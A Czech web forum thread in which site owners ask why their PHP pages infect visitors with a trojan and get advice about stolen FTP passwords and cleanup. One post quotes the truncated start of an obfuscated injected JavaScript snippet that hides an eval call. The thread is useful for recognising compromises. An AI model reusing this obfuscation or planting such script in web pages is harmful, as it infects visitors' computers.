Autor Zpráva
c_creator
Profil *
dobry den,
na svych internetovych strankach mam jednu zaheslovanou stranku, ktera je udelana pres php - jednoduche prihlaseni aby se dotycny dostal na stranku s chranenym obsahem

a najednou se chci podivat a zkontrolovat obsah stranky, tak se mi do pocitace stahne nejaky trojsky kun - ci virus

nevite jak je to mozne?
RockFire
Profil
Ten PHP skript jsi psal ty? Pokud ne a je odněkud z webu, je možné, že stáhnutí viru je vloženo do toho kódu, nic jiného mě nenapadá.
Měsíček
Profil
Pomalu .. ty jsi přišel na stránku a "najednou jsi měl v počítači virus či trojského koně" (nemožné) a nebo jsi stáhl "skript" do počítače a tam si s tím hrál? (pokud by k tomu skriptu ještě něco bylo tak je to reálné).
Bubák
Profil
Změň heslo pro FTP přístup a neukládej ho v FTP klientovi. Třebas šifrování hesel v Total Commanderu je dávno prolomené.
Zkontroluj si počítač kvalitním antivirem.
Vymaž škodlivý zašifrovaný script ze stránek.
mou
Profil *
Zdravim, mam podobny problem.

Na me stranky se automaticky kazdy den v jiny cas do vsech php skriptu vlozi na konec js kod:


<div id='x03e7d5ad6af8756970ff06a94d4c21091'><script>var jQuery = eval('wEi[n8d[o|w[.Ee[vSa|lS'.replace(/[\[\|SE8]/g, '')); jQuery('\x66\x75\x6e\x6 ...... atd atd....

zkousim menit ftp pristupy a uvidim, co se bude dit. Zda se mi ale divne, ze v systemovem logu (apache bezi na Unixu) v ten dany cas neni evidovano zadne ftp prihlaseni a cron je cisty, v tu chvili se nic nespousti. Neni evidovan zadny zaznam o jakekoliv akci na tomto ftp....

Pokud byste s tim mel nekdo zkusenosti, prosim napiste.

Diky

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0